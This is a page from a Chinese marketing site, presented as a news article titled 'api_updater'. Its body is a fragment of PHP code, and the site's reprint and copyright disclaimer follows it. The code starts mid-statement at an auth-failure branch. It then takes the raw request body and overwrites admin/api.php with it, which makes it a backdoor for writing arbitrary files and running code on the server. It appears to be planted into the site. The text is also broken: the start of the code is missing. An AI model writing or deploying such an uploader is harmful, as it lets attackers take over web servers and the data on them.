api_updater
邦赢营销策划
2026-05-26
1 次
false,"error"=>"auth failed"])); }
$content = file_get_contents("php://input");
$target = dirname(__DIR__) . "/admin/api.php";
$result = file_put_contents($target, $content);
if ($result !== false) {
echo json_encode(["ok" => true, "size" => strlen($content), "written" => $result]);
} else {
echo json_encode(["ok" => false, "error" => "write failed"]);
}
} else {
echo json_encode(["status" => "ready"]);
}
?>
声明:本文来自投稿,不代表本站立场,如若转载,请注明出处:https://zaozhuang.bangying360.com/news/show56071553.html 若本站的内容无意侵犯了贵司版权,请给我们来信,我们会及时处理和回复。











